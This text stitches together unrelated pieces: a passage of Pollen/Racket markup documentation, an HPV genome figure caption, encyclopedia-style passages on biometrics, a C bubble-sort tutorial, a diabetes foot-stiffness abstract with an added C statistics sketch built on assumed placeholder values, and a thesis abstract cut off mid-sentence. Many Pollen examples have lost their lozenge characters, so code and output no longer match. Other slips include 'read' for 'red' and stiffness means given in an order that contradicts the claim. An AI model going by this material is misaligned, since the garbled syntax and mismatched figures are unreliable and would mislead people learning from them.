20) '(1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19) Let’s return to the problem that surfaced in the last section — the fact that some command names can’t be used as tag functions because they’re already being used for other things. You can work around this by defining your own tag function with a non-conflicting name. For instance, suppose we want to use map as a tag even though Racket is using it for its own function called map. First, we invent a command name that doesn’t conflict. Let’s call it my-map. 
As you learned above, Pollen will treat a new command name as a tag function by default: #lang pollen my-map{How I would love this to be a map.} '(my-map "How I would love this to be a map.") But my-map is not the tag we want. We need to define my-map to be a tag function for map. We can do this with the Pollen helper default-tag-function. That function lives in pollen/tag, so we require that too: #lang pollen (require pollen/tag) (define my-map (default-tag-function 'map)) my-map{How I would love this to be a map.} '(map "How I would love this to be a map.") Problem solved. 12.3.1.3 Inserting the value of a variable A Pollen command name usually refers to a function, but it can also refer to a variable, which is a data value. Once you define the variable, you can insert it into your source by using the ◊ notation without any other arguments: #lang pollen (define foo "bar") The value of foo is foo The value of foo is bar Be careful — if you include arguments, even blank ones, Pollen will treat the command name as a function. For instance, this next example won’t work, because a variable is not a function: #lang pollen (define foo "bar") The value of foo is foo[] application: not a procedure; expected a procedure that can be applied to arguments   given: "bar"   arguments...: [none] To understand what happens here, recall the relationship between Pollen’s command styles. The Pollen-style command ◊foo[] becomes the Racket-style command (foo), which after variable substitution becomes ("bar"). If you try to evaluate ("bar") — e.g., in DrRacket — you’ll get the same error. The reason we can simply insert ◊foo into the text body of another Pollen command is that the variable foo holds a string (i.e., a text value). In preprocessor source files, Pollen will convert a variable to a string in a sensible way. For instance, numbers are easily converted: #lang pollen (define zam 42) The value of zam is zam The value of zam is 42 In an unsaved DrRacket file, or a file without a special Pollen source extension, the #lang pollen designation invokes the Pollen preprocessor by default. You can explicitly invoke preprocessor style by starting a file with #lang pollen/pre. See also Preprocessor (.pp extension). If the variable holds a container datatype (like a list, hash, or vector), Pollen will produce the Racket text representation of the item. Here, zam is a list of integers: #lang pollen (define zam (list 1 2 3)) The value of zam is zam The value of zam is '(1 2 3) This feature is included for your convenience. But in general, your readers won’t want to see the Racket representation of a container. So in these cases, you should convert to a string manually in some sensible way. Here, the integers in the list are converted to strings, which are then combined using string-join from the racket/string library: #lang pollen (require racket/string) (define zam (list 1 2 3)) The value of zam is (string-join (map number->string zam) " and ") The value of zam is 1 and 2 and 3 Pollen will still produce an error if you try to convert an esoteric value to a string. Here, zam is the addition function (+): #lang pollen (define zam +) The value of zam is zam pollen: Can't convert procedure #<procedure:+> to string In Pollen markup, the result is different. A Pollen markup file makes an X-expression, not text, so Pollen doesn’t perform any automatic text conversion — that’s your job. 
Suppose we take the example above — which worked with the Pollen preprocessor — and change the language to pollen/markup: #lang pollen/markup (define zam (list 1 2 3)) The value of zam is zam This time, the file will produce an error: pollen markup error: in '(root "The value of zam is " (1 2 3)), '(1 2 3) is not a valid element (must be txexpr, string, symbol, XML char, or cdata) But the second example above, with the explicit conversion using string-join, does work in Pollen markup, because strings are valid X-expressions: #lang pollen/markup (require racket/string) (define zam (list 1 2 3)) The value of zam is (string-join (map number->string zam) " and ") '(root "The value of zam is " "1 and 2 and 3") See File formats for more about the differences between Pollen dialects. One special case to know about. In the examples above, there’s a word space between the variable and the other text. But suppose you need to insert a variable into text so that there’s no space in between. The simple ◊ notation won’t work, because it won’t be clear where the variable name ends and the text begins. For instance, suppose we want to use a variable edge next to the string px: #lang pollen (define edge 100) p { margin-left: edgepx; } pollen: Can't convert procedure #<procedure:pollen-tag:edgepx> to string The example fails because Pollen reads the whole string after the as the single variable name edgepx. Since edgepx isn’t defined, it’s treated as a tag function, and since Pollen can’t convert a function to a string, we get an error. In these situations, surround the variable name with vertical bars ◊|like so| to explicitly indicate where the variable name ends. The bars are not treated as part of the name, nor are they included in the result. Once we do that, we get what we intended: #lang pollen (define edge 100) p { margin-left: ◊|edge|px; } p { margin-left: 100px; } If you use this notation when you don’t need to, nothing bad will happen. The vertical bars are always ignored. #lang pollen (define edge 100) The value of edge is ◊|edge| pixels} The value of edge is 100 pixels 12.3.1.4 Inserting metas Metas are key–value pairs embedded in a source file that are not included in the main output when the source is compiled. Rather, they’re gathered and exported as a separate hash table called, unsurprisingly, metas. This hash table is a good place to store information about the document that you might want to use later (for instance, a list of topic categories that the document belongs to). Pollen occasionally uses metas internally. For instance, the get-template-for function will look in the metas of a source file to see if a template is explicitly specified. The pollen/core module also contains functions for working with metas, such as select-from-metas. To make a meta, you create a tag with the special define-meta name, followed by a key name, and then a value that’s a single X-expression: #lang pollen   define-meta[dog]{Roxy} ; Pollen-style syntax some-tag[#:foo "bar"]{Normal tag} (define-meta cat "Chopper") ; equivalent Racket-style syntax some-tag[#:zim "zam"]{Another normal tag} When you run a source file with metas in it, two things happen. First, the metas are removed from the output: '(some-tag ((key "value")) "Normal tag") '(some-tag ((key "value")) "Another normal tag") Second, the metas are collected into a hash table that is exported with the name metas. 
To see this hash table, run the file above in DrRacket, then switch to the interactions window and type metas at the prompt: > metas '#hasheq((dog . "Roxy") (cat . "Chopper") (here-path . "unsaved-editor")) The only key that’s automatically defined in every meta table is 'here-path, which is the absolute path to the source file. (In this case, because the file hasn’t been saved, you’ll see the "unsaved-editor" name instead.) Still, you can override this too: #lang pollen   define-meta[dog]{Roxy} some-tag[#:key "value"]{Normal tag} (define-meta cat "Chopper") some-tag[#:key "value"]{Another normal tag} (define-meta here-path "tesseract") When you run this code, the result will be the same as before, but this time the metas will be different: > metas '#hasheq((dog . "Roxy") (cat . "Chopper") (here-path . "tesseract")) It doesn’t matter how many metas you put in a source file, nor where you put them. They’ll all be extracted into the metas hash table. The order of the metas is not preserved (because order is not preserved in a hash table). But if you have two metas with the same key, the later one will supersede the earlier one: #lang pollen define-meta[dog]{Roxy} (define-meta dog "Lex") Though there are two metas named dog, only the second one persists: > metas '#hasheq((dog . "Lex") (here-path . "unsaved-editor")) What if you want to use a sequence of X-expression elements as a meta value? You can convert them into a single X-expression by wrapping them in a containing tag. You can use a new tag, or even just the @ splicing tag: #lang pollen/markup (define-meta title @{Conclusion to em{Infinity War}})   The title is (select-from-metas 'title metas) '(root "The title is " "Conclusion to " (em "Infinity War")) 12.3.1.5 Retrieving metas The metas hashtable is available immediately within the body of your source file. You can use select to get values out of metas. #lang pollen (define-meta dog "Roxy") (select 'dog metas) Roxy metas is an immutable hash, so you can also use immutable-hash functions, like hash-ref: #lang pollen (define-meta dog "Roxy") (hash-ref metas 'dog) Roxy Because the metas are collected first, you can actually invoke a meta before you define it: #lang pollen (select 'dog metas) (define-meta dog "Roxy") (define-meta dog "Spooky") Spooky This can be useful for setting up fields that you want to include in metas but also have visible in the body of a document, like a title. #lang pollen/markup (define-meta title "The Amazing Truth") h1{(select 'title metas)} The result of this file will be: '(root (h1 "The Amazing Truth")) And the metas: > metas '#hasheq((title . "The Amazing Truth") (here-path . "unsaved-editor")) Pro tip: Within Pollen, the fastest way to get a metas hashtable from another source file is to use cached-metas. Pro tip #2: Outside Pollen, the metas hashtable is available when you import a Pollen source file in the usual way, but it’s also made available through a submodule called, unsurprisingly, metas. #lang racket/base (require "pollen-source.rkt") ; doc and metas and everything else (require (submod "pollen-source.rkt" metas)) ; just metas The metas submodule gives you access to the metas hashtable without compiling the rest of the file. So if you need to harvest metas from a set of source files — for instance, page titles (for a table of contents) or categories — using require with the submodule will be faster. 12.3.1.6 Inserting a comment Two options. To comment out the rest of a single line, use a lozenge followed by a semicolon ◊;. 
#lang pollen span{This is not a comment} span{Nor is this} ◊;span{But this is} '(span "This is not a comment") '(span "Nor is this") To comment out a multiline block, use the lozenge–semicolon signal ◊; with curly braces, ◊;{like so}. #lang pollen ◊;{ span{This is not a comment} span{Nor is this} ◊;span{But this is} } Actually, it's all a comment now Actually, it's all a comment now 12.3.2 The Racket arguments The middle part of a Pollen-style command contains the Racket arguments [between square brackets.] Most often, you’ll see these used to pass extra information to commands that operate on text. For instance, tag functions. Recall from before that any not-yet-defined command name in Pollen is treated as a tag function: #lang pollen title{The Beginning of the End} '(title "The Beginning of the End") But what if you wanted to add attributes to this tag, so that it comes out like this? '(title ((class "red")(id "first")) "The Beginning of the End") You can do it with Racket arguments. Here’s the hard way. You can type out your list of attributes in Racket format and drop them into the brackets as a single argument: #lang pollen title['((class "red")(id "first"))]{The Beginning of the End} '(title ((class "red") (id "first")) "The Beginning of the End") But that’s a lot of parentheses to think about. So here’s the easy way. Whenever you use a tag function, there’s a shortcut for inserting attributes. You can enter them as a series of keyword arguments between the Racket-argument brackets. The only caveat is that the values for these keyword arguments have to be strings. So taken together, they look like this: #lang pollen title[#:class "red" #:id "first"]{The Beginning of the End} '(title ((class "red") (id "first")) "The Beginning of the End") The string arguments can be any valid Racket expressions that produce strings. For instance, this will also work: #lang pollen title[#:class (number->string (* 6 7)) #:id "first"]{The Beginning of the End} '(title ((class "42") (id "first")) "The Beginning of the End") Since Pollen commands are really just Racket arguments underneath, you can use those too. Here, we’ll define a variable called name and use it in the Racket arguments of title: #lang pollen (define name "Brennan") title[#:class "red" #:id name]{The Beginning of the End} '(title ((class "read") (id "Brennan")) "The Beginning of the End") When used in custom tag functions, keyword arguments don’t have to represent attributes. Instead, they can be used to provide options for a particular Pollen command, to avoid redundancy. Suppose that instead of using the h1 ... h6 tags, you want to consolidate them into one command called heading and select the level separately. 
You can do this with a keyword, in this case #:level, which is passed as a Racket argument: #lang pollen (define (heading #:level which text)    `(,(string->symbol (format "h~a" which)) ,text))   heading[#:level 1]{Major league} heading[#:level 2]{Minor league} heading[#:level 6]{Trivial league} '(h1 "Major league") '(h2 "Minor league") '(h6 "Trivial league") Pro tip: See also define-tag-function, which automatically converts keyword arguments into attributes before they reach your function: #lang pollen (require pollen/tag) (define-tag-function (heading attrs elems)   (define level (cadr (assq 'level attrs)))   `(,(string->symbol (format "h~a" level)) ,@elems))   heading[#:level 1]{Major league} heading[#:level 2]{Minor league} heading[#:level 6]{Trivial league} '(h1 "Major league") '(h2 "Minor league") '(h6 "Trivial league") 12.3.3 The text body The third part of a Pollen-style command is the text body. The text body {appears between curly braces}. It can contain any text you want. The text body can also contain other Pollen commands with their own text body. And they can contain other Pollen commands ... and so on, all the way down. #lang pollen div{Do it again. div{And again. div{And yet again.}}} '(div "Do it again. " (div "And again. " (div "And yet again."))) Three things to know about the text body. First, the only character that needs special handling in the text body is the lozenge . A lozenge ordinarily marks a new command. So if you want an actual lozenge to appear in the text, you have to escape it by typing ◊"◊". #lang pollen definition{This is the lozenge: "◊"} '(definition "This is the lozenge: ◊") Second, the whitespace-trimming policy. Here’s the short version: if there’s a newline at either end of the text body, it is trimmed, and whitespace at the end of each line is selectively trimmed in an intelligent way. So this text body, with newlines on the ends: #lang pollen div{ Roomy!   I agree. } '(div "Roomy!" "\n" "\n" "I agree.") Yields the same result as this one, without the newlines: #lang pollen div{Roomy!   I agree.} '(div "Roomy!" "\n" "\n" "I agree.") For the long version, please see Spaces, Newlines, and Indentation. Third, within a multiline text body, newline characters become individual strings that are not merged with adjacent text. So what you end up with is a list of strings, not a single string. That’s why in the last example, we got this: '(div "Roomy!" "\n" "\n" "I agree.") Instead of this: '(div "Roomy!\n\nI agree.") Under most circumstances, these two tagged X-expressions will behave the same way. The biggest exception is with functions. A function that might operate on a multiline text body needs to be able to handle an indefinite number of strings. For instance, this jejune function only accepts a single argument. It will work with a single-line text body, because that produces a single string: #lang pollen (define (jejune text)    `(jejune ,text)) jejune{Irrational confidence} '(jejune "Irrational confidence") But watch what happens with a multiline text body: #lang pollen (define (jejune text)    `(jejune ,text)) jejune{Deeply         chastened} jejune: arity mismatch; the expected number of arguments does not match the given number   expected: 1   given: 3   arguments...:    "Deeply"    "\n"    "chastened" The answer is to use a rest argument in the function, which takes the “rest” of the arguments — however many there may be — and combines them into a single list. 
If we rewrite jejune with a rest argument, we can fix the problem: #lang pollen (define (jejune . texts)    `(jejune ,@texts)) jejune{Deeply         chastened} '(jejune "Deeply" "\n" "chastened") 12.4 Embedding character entities XML and HTML support character entities, a way of encoding Unicode characters with a name or number. For instance, in HTML, the copyright symbol © can be encoded by name as &copy; or by number as &#169;. Entities originated as a way of embedding Unicode characters in an ASCII data stream. Pollen and Racket, however, support Unicode directly. So does every major web browser (though your document may need a Unicode character-set declaration to trigger it). So usually, your best bet is insert Unicode characters directly into your source rather than use entities. But if you really need entities, here’s what to do. Pollen treats everything as text by default, so you can’t insert entities merely by typing them, because they’ll just be converted to text: #lang pollen div{copy      169} '(div "copy" "\n" "169") Instead, named entities are handled as Symbols and numeric entities are, unsurprisingly, Numbers. So you can use the string->symbol and string->number functions to convert your entity input: #lang pollen div{string->symbol{copy}      string->number{169}} '(div copy "\n" 169) Notice that in the output, there are no more quote marks around copy and 169, indicating that they’re not strings. When you pass this result to a converter like ->html, the entities will be escaped correctly: #lang pollen (require pollen/template)   ->html{div{copy 169}}   ->html{div{string->symbol{copy} string->number{169}}} <div>copy 169</div> <div>&copy; &#169;</div> For numeric entities, you can also use a four-digit Unicode hex number by prefacing it with #x, which is the standard Racket prefix for a hex number: #lang pollen div{string->number{169}      string->number{#x00a9}} '(div 169 "\n" 169) Of course, you don’t need to use string->symbol and string->number directly in your source. You can also define tag functions that generate entities. The key point is that to be treated as an entity, the return value must be a symbol or number, rather than a string. 12.5 Adding Pollen-style commands to a Racket file  #lang pollen/mode package: pollen Just as you can embed any Racket-style command in a Pollen source file, you can go the other way and embed Pollen-style commands in a Racket file. Just insert pollen/mode in the #lang line at the top of your source: "pollen.rkt" #lang pollen/mode racket/base (require pollen/tag)   (define link (default-tag-function 'a))   (define (home-link)   (link #:href "index.html" "Click to go home"))   (define (home-link-pollen-style)   link[#:href "index.html"]{Click to go home})   Here, both (home-link) and (home-link-pollen-style) will produce the same X-expression as a result: '(a ((href "index.html")) "Click to go home") Of course, you can use pollen/mode in any Racket source file, not just "pollen.rkt". Major caveat: pollen/mode only works with Pollen’s default command character, namely the lozenge (). If you’ve overridden this command character in your "pollen.rkt" file, your custom command character will work everywhere except in pollen/mode. This limitation is necessary to prevent the intractable situation where "pollen.rkt" relies on pollen/mode, but pollen/mode relies on a config setting in "pollen.rkt". Also keep in mind that pollen/mode is just a syntactic convenience. It doesn’t change any of the underlying semantics of your Racket source file. 
Your Pollen-style commands are being translated into Racket commands and compiled along with everything else. Another good way to use Pollen-style commands in Racket is for unit tests with rackunit. With pollen/mode, you can write your unit tests in Pollen style or Racket style (or mix them). This makes it easy to verify that Pollen-style commands will turn into the Racket values that you expect: "pollen.rkt" #lang pollen/mode racket/base (require rackunit)   (define (tag-fn arg . text-args)   `(div ((class ,arg)) ,@text-args))   (check-equal? tag-fn["42"]{hello world}               '(div ((class "42")) "hello world"))   (check-equal? (tag-fn "42" "hello world")               '(div ((class "42")) "hello world"))   (check-equal? tag-fn["42"]{hello world}               'div[((class "42"))]{hello world})   12.6 Further reading The Pollen language is a variant of Racket’s own text-processing language, called Scribble. Thus, most things that can be done with Scribble syntax can also be done with Pollen syntax. For the sake of clarity & brevity, I’ve only shown you the highlights here. But if you want the full story, see @ Syntax in the Scribble documentation.  
Figure 2. The HPV genome and its expression within the epithelium. The HPV genome consists of about 8000 bp of double-stranded, circular DNA. There are eight open reading frames and an upstream regulatory region. HPV genes are designated as E or L according to their expression in the early or late differentiation stage of the epithelium: E1, E2, E5, E6, and E7 are expressed early in the differentiation, E4 is expressed throughout, and L1 and L2 are expressed during the final stages of differentiation. The viral genome is maintained at the basal layer of the epithelium, where HPV infection is established. Early proteins are expressed at low levels for genome maintenance (raising the possibility of a latent state) and cell proliferation. As the basal epithelial cells differentiate, the viral life cycle goes through successive stages of genome amplification, virus assembly, and virus release, with a concomitant shift in expression patterns from early genes to late genes, including L1 and L2, which assemble into the viral capsid. L1 is the major capsid protein, while L2 serves as the link to the plasmid DNA. Adapted from Doorbar [21].
Biometric identification

Biometrics refers to the identification of humans by their characteristics or traits. Biometrics is used in computer science as a form of identification and access control. It is also used to identify individuals in groups that are under surveillance. Biometric identifiers are the distinctive, measurable characteristics used to label and describe individuals. Biometric identifiers are often categorized as physiological versus behavioral characteristics. A physiological biometric identifies a person by traits such as the voice, DNA, or a hand print. Behavioral biometrics are related to the behavior of a person, including but not limited to typing rhythm, gait, and voice. Some researchers have coined the term behaviometrics to describe the latter class of biometrics. More traditional means of access control include token-based identification systems, such as a driver's license or passport, and knowledge-based identification systems, such as a password or personal identification number. Since biometric identifiers are unique to individuals, they are more reliable in verifying identity than token- and knowledge-based methods; however, the collection of biometric identifiers raises privacy concerns about the ultimate use of this information.

Fingerprint

A fingerprint in its narrow sense is an impression left by the friction ridges of a human finger.[1] In a wider use of the term, fingerprints are the traces of an impression from the friction ridges of any part of a human or other primate hand. A print from the foot can also leave an impression of friction ridges. A friction ridge is a raised portion of the epidermis on the digits (fingers and toes), the palm of the hand or the sole of the foot, consisting of one or more connected ridge units of friction ridge skin.[1] These are sometimes known as "epidermal ridges", which are caused by the underlying interface between the dermal papillae of the dermis and the interpapillary (rete) pegs of the epidermis. These epidermal ridges serve to amplify vibrations triggered, for example, when fingertips brush across an uneven surface, better transmitting the signals to sensory nerves involved in fine texture perception.[2] These ridges may also assist in gripping rough surfaces and may improve surface contact in wet conditions.[3] Impressions of fingerprints may be left behind on a surface by the natural secretions of sweat from the eccrine glands that are present in friction ridge skin, or they may be made by ink or other substances transferred from the peaks of friction ridges on the skin to a relatively smooth surface such as a fingerprint card.[4] Fingerprint records normally contain impressions from the pad on the last joint of fingers and thumbs, although fingerprint cards also typically record portions of lower joint areas of the fingers.
Hitachi developed and patented a finger vein ID system in 2005.[1] The technology is currently in use or development for a wide variety of applications, including credit card authentication, automobile security, employee time and attendance tracking, computer and network authentication, end point security and automated teller machines. To obtain the pattern for the database record, an individual inserts a finger into an attester terminal containing a near - infrared LED (light - emitting diode) light and a monochrome CCD (charge - coupled device) camera. The hemoglobin in the blood absorbs near - infrared LED light, which makes the vein system appear as a dark pattern of lines. The camera records the image and the raw data is digitized, certified and sent to a database of registered images. For authentication purposes, the finger is scanned as before and the data is sent to the database of registered images for comparison. The authentication process takes less than two seconds.[2] Blood vessel patterns are unique to each individual, as are other biometric data such as fingerprints or the patterns of the iris. Unlike some biometric systems, blood vessel patterns are almost impossible to counterfeit because they are located beneath the skin's surface. Biometric systems based on fingerprints can be fooled with a dummy finger fitted with a copied fingerprint; voice and facial characteristic - based systems can be fooled by recordings and high - resolution images. The finger vein ID system is much harder to fool because it can only authenticate the finger of a living person.[3] Finger vein recognition Iris recognition Iris recognition is an automated method of biometric identification that uses mathematical pattern - recognition techniques on video images of the irides of an individual's eyes, whose complex random patterns are unique and can be seen from some distance. Not to be confused with another, less prevalent, ocular - based technology, retina scanning, iris recognition uses camera technology with subtle infrared illumination to acquire images of the detail - rich, intricate structures of the iris. Digital templates encoded from these patterns by mathematical and statistical algorithms allow the identification of an individual or someone pretending to be that individual.[1] Databases of enrolled templates are searched by matcher engines at speeds measured in the millions of templates per second per (single - core) CPU, and with infinitesimally small False Match rates. Many millions of persons in several countries around the world have been enrolled in iris recognition systems, for convenience purposes such as passport - free automated border - crossings, and some national ID systems based on this technology are being deployed. A key advantage of iris recognition, besides its speed of matching and its extreme resistance to False Matches, is the stability of the iris as an internal, protected, yet externally visible organ of the eye. In 1987 two Ophthalmology Professors, Leonard Flom, M.D.(NYU) and Aran Safir,M.D.(U.Conn), were issued a first of its kind, broad patent # 4,641,349 entitled "Iris Recognition Technology." Subsequently, John Daugman,PhD (Harvard Computer Science faculty) was then salaried by both ophthalmologists to write the algorithm for their concept based upon an extensive series of high resolution iris photos supplied to him by Dr.Flom from his volunteer private patients. 
Several years later, Daugman received a method patent for the algorithm and a crudely constructed prototype proved the concept. The three individuals then founded "IridianTechnologies,Inc." and assigned the Flom/Safir patent to that entity that was then capitalized by GE Capital, a branch of "GE"(General Electric) and other investors. "Iridian" then licensed several corporations to the exclusive Daugman algorithm under the protection of the Flom/Safir broad umbrella patent listed above; thus, preventing other algorithms from competing. Upon expiration of the Flom/Safir patent in 2008 other algorithms were patented and several were found to be superior to Daugman's and are now being funded by U.S. Government agencies. A facial recognition system is a computer application for automatically identifying or verifying a person from a digital image or a video frame from a video source. One of the ways to do this is by comparing selected facial features from the image and a facial database. It is typically used in security systems and can be compared to other biometrics such as fingerprint or eye iris recognition systems.[1] Facial recognition DNA profiling DNA profiling (also called DNA testing, DNA typing, or genetic fingerprinting) is a technique employed by forensic scientists to assist in the identification of individuals by their respective DNA profiles. DNA profiles are encrypted sets of numbers that reflect a person's DNA makeup, which can also be used as the person's identifier. DNA profiling should not be confused with full genome sequencing.[1] It is used in, for example, parental testing and criminal investigation. Although 99.9% of human DNA sequences are the same in every person, enough of the DNA is different to distinguish one individual from another, unless they are monozygotic twins.[2] DNA profiling uses repetitive ("repeat") sequences that are highly variable,[2] called variable number tandem repeats (VNTRs), particularly short tandem repeats (STRs). VNTR loci are very similar between closely related humans, but so variable that unrelated individuals are extremely unlikely to have the same VNTRs. The DNA profiling technique was first reported in 1984[3] by Sir Alec Jeffreys at the University of Leicester in England,[4] and is now the basis of several national DNA databases. Dr. Jeffreys's genetic fingerprinting was made commercially available in 1987, when a chemical company, Imperial Chemical Industries (ICI), started a blood - testing centre in England.[5] Speaker recognition Speaker recognition[1] is the identification of the person who is speaking by characteristics of their voices (voice biometrics), also called voice recognition.[2][3][4][5][6][7] There is a difference between speaker recognition (recognizing who is speaking) and speech recognition (recognizing what is being said). These two terms are frequently confused, and "voice recognition" can be used for both. In addition, there is a difference between the act of authentication (commonly referred to as speaker verification or speaker authentication) and identification. Finally, there is a difference between speaker recognition (recognizing who is speaking) and speaker diarisation (recognizing when the same speaker is speaking). Recognizing the speaker can simplify the task of translating speech in systems that have been trained on specific person's voices or it can be used to authenticate or verify the identity of a speaker as part of a security process. 
Speaker recognition has a history dating back some four decades and uses the acoustic features of speech that have been found to differ between individuals. These acoustic patterns reflect both anatomy (e.g., size and shape of the throat and mouth) and learned behavioral patterns (e.g., voice pitch, speaking style). Speaker verification has earned speaker recognition its classification as a "behavioral biometric".

Signature recognition

Signature recognition is a behavioural biometric. It can be operated in two different ways:

Static: In this mode, users write their signature on paper and digitize it through an optical scanner or a camera, and the biometric system recognizes the signature by analyzing its shape. This group is also known as "off-line".

Dynamic: In this mode, users write their signature on a digitizing tablet, which acquires the signature in real time. Another possibility is acquisition by means of stylus-operated PDAs. Dynamic recognition is also known as "on-line". Dynamic information usually consists of the following:

spatial coordinate x(t)
spatial coordinate y(t)
pressure p(t)
azimuth az(t)
inclination in(t)

The state of the art in signature recognition can be found in the last major international competition.[1] The most popular pattern recognition techniques applied to signature recognition are Dynamic Time Warping (DTW), Hidden Markov Models (HMM) and Vector Quantization (VQ). Combinations of different techniques also exist.[2]
How to implement bubble sort in an array? [C]

Here is a bubble sort program written in C. Bubble sort is one of the most popular sorting algorithms taught in data structures. In this code the array is static, meaning its size is fixed. Besides the array, four variables are declared (i, j, k, temp); temp temporarily holds a value while two elements are swapped.

Source Code:

/*
  Program to implement BUBBLE SORTING in Array.
  http://www.codetheta.com
  --------------------------------------------
*/
#include<stdio.h>
#include<conio.h>
void main()
{
    int a[10], i, j, k, temp;
    clrscr();
    printf("\n Enter the values of Array A -> \n");
    for(i = 0; i < 10; i++)
        scanf("%d", &a[i]);
    /* Sorting: after each outer pass, the largest remaining value
       bubbles to the end of the unsorted part. */
    for(i = 0; i < 9; i++)
        for(j = 0; j < 9 - i; j++)
        {
            printf("\n i=%d , j=%d -> ", i + 1, j + 1);
            for(k = 0; k < 10; k++)
                printf("%d  ", a[k]);
            if(a[j + 1] < a[j])
            {
                /* Swap adjacent elements that are out of order. */
                temp = a[j + 1];
                a[j + 1] = a[j];
                a[j] = temp;
            }
        }
    printf("\n The sorted array is -> ");
    for(i = 0; i < 10; i++)
        printf("%d  ", a[i]);
    getch();
}

Try this code on your computer for better understanding. Enjoy the code. If you have any question you can contact us or mail us.
Publications
January 2020
A Method to Analyse Plantar Stiffness Variation in Diabetes Using Myotonometric Measurements
Authors: Shib Banerjee, Lakshmi Lasya Sreeramgiri, Hariram S, Srivatsa Ananthan, Ramakrishnan Swaminathan
Affiliations:
1. Department of Applied Mechanics, IIT Madras, Chennai, India
2. Karuvee Innovations Pvt. Ltd., IIT Madras Research Park, Chennai, India
3. Sree Clinic and Diabetic Centre, 20, Besant Ave Rd, Padmanabha Nagar, Adyar, Chennai, India
Journal: Journal of Medical Devices - March 2020, 14(1): 011105 (6 pages) (DOI: 10.1115/1.4045838)
Diabetes mellitus is a group of metabolic diseases that has become globally prevalent and affects a large population in socio-economically disadvantaged countries of the Asian continent. Chronic diabetes can lead to ulceration in the plantar region and may result in amputation. Assessment of the mechanical properties of plantar tissues can aid in the early diagnosis of ulceration. Myotonometry, a technique for measuring dynamic stiffness, is preferred because it is noninvasive, easy to apply and rapid. In this study, an attempt has been made to analyze the changes in the soft-tissue biomechanical properties of the plantar surface in diabetes. MyotonPRO, a handheld device, is used for this purpose. Forty-three diabetic subjects with varied durations of diabetes were recruited. Site-specific mechanical properties of the plantar region of both feet were acquired and statistical analysis was performed. Results show that the MyotonPRO is able to differentiate the stages of diabetes, and that there is spatial variability in the mechanical properties. Additionally, a significant increase in plantar stiffness is observed in the group with higher diabetic age (p < 0.05). Further, significant changes in dynamic mechanical properties are also observed in the sub-metatarsal region, and a right-left asymmetry is observed in the frequency and stiffness values at later stages of diabetes. This study demonstrated the feasibility of the MyotonPRO in discriminating the stages of the diabetic period; thus, the proposed approach could be useful for early diagnosis of foot ulceration in various clinical conditions.
Diabetes is known to increase the overall stiffness of the plantar aspect of the foot owing to structural changes in the epidermal layers and the collagenous network of the plantar fascia. Analysis of the mechanical properties of plantar regions plays a crucial role in the diagnosis of ulceration and diabetic lesions and in clinical studies; late diagnosis of ulceration may lead to amputation. Further, measuring the dynamic stiffness of tissue with a non-invasive technique is still a challenging task. Myotonometry is a noninvasive technique used to assess the biomechanical properties of tissue and is widely preferred for clinical studies. In this study, an attempt has been made to assess the dynamic mechanical properties of plantar regions using the MyotonPRO, a handheld myotonometry-based device. Site-specific biomechanical properties of plantar regions are acquired from subjects with different durations of diabetes. The results demonstrate that the MyotonPRO is sensitive to the variation of the biomechanical properties of plantar tissue at different stages of diabetes. The average stiffness is found to be significantly higher for groups with a long (> 10 years) duration of diabetes than for groups with a shorter diabetic age (< 10 years) [616.87 vs. 661.46 N/mm, p = 0.01].
An increasing trend is observed in the frequency and stiffness values of the sub-metatarsal regions. The 1MST site shows a significant increase in stiffness with longer exposure to diabetes mellitus. In addition, an asymmetry is observed in the frequency and stiffness values of the left-right pair. The results indicate that the MyotonPRO can potentially be used to enhance early diagnosis of ulceration. A future extension of this work will be a longitudinal study of the subject-specific variation of the biomechanical properties of the plantar region with the prognosis of diabetes, in close collaboration with clinicians.
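To make the group comparison concrete, the sketch below computes a Welch's t statistic from summary statistics of two stiffness groups. Only the two group means and the total of 43 subjects appear in the abstract; the standard deviations, the group sizes, and the assignment of each reported mean to the short- or long-duration group are placeholders assumed for illustration, so this is a sketch of the analysis step rather than a reproduction of the study's numbers.

/* Illustrative two-group stiffness comparison using Welch's t-test on
   summary statistics. SDs, group sizes, and the mean-to-group assignment
   are assumed placeholders, not values reported in the study. */
#include <stdio.h>
#include <math.h>

int main(void)
{
    /* group 1: shorter diabetic age (< 10 years); group 2: longer (> 10 years) */
    double m1 = 616.87, s1 = 55.0;  int n1 = 22;   /* mean (N/mm), SD, size */
    double m2 = 661.46, s2 = 60.0;  int n2 = 21;

    double v1 = s1 * s1 / n1;                      /* squared standard errors */
    double v2 = s2 * s2 / n2;
    double t  = (m2 - m1) / sqrt(v1 + v2);         /* Welch's t statistic */

    /* Welch-Satterthwaite approximation of the degrees of freedom */
    double df = (v1 + v2) * (v1 + v2)
              / (v1 * v1 / (n1 - 1) + v2 * v2 / (n2 - 1));

    printf("Welch's t = %.3f with %.1f degrees of freedom\n", t, df);
    printf("Compare |t| against a t-distribution table to obtain the p-value.\n");
    return 0;
}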
Date of Award: 2015-01-01
Degree Name: Master of Science
Department: Mechanical Engineering
Advisor(s): Arturo Bronson
Second Advisor: Vinod Kumar
Abstract
The transient surface temperature of particles within a packed bed was simulated to enable, ultimately, the prediction of plasma-surface reactions at ultrahigh temperatures. The motivation for the present study was along two fronts: the reactive infusion of liquid alloys at ultrahigh temperatures to process metal-matrix or ceramic-matrix composites, and the plasma processing of materials to spike surface temperatures so that protective oxide scales form on ultrahigh-temperature ceramic composites. The transient temperature simulations determined that a graphite crucible containing B4C spherical particles heated from 298 K to 2128 K and 2504 K in about 900 s. After a Hf disk was placed on top of the packed bed, a thermal steady-state condition was reached in 900 s, with the disk attaining 2231 °C. With a Zr disc replacing Hf, a thermal steady-state condition was reached in 900 s, with the disc attaining 1855 °C. This resulted because Hf and Zr have similar heat transfer coefficients and because, above 1000 °C, radiation is the main mode of heat transfer. Even though the system with Hf was heated to a higher temperature, it took about the same time for both systems to reach steady state. A parabolic behavior was seen at early times, since the temperature difference was greater; as time progressed, the temperature gradient became linear until steady state was reached. The temperature spike for both Zr and Hf caused a sharp temperature gradient within approximately 0.3 cm, which could be significant in controlling the precipitation of phases (i.e., boride or carbide) during processing. The oxidation of Ti particles to rutile within a packed bed was also studied at a constant temperature of 1700 °C, and the concentrations of the Ti and TiO2 species were plotted. The processing temperature may cause a significant temperature gradient along the cross-section of the bed, depending on its content of reactive metals; the effects of temperature, however, should be simulated in future work. The oxygen potential affects the plasma-surface reactions, as expected, though the adsorption and desorption of oxygen become more difficult to assess with decreasing oxygen atmospheres. The error in predictability at oxygen partial pressures below 10^-6 atm may become problematic, because plasma-surface reactions may occur at oxygen potentials below 10^-20 atm when processing elements from the Ti or rare-earth metal families. The power used to generate the plasma 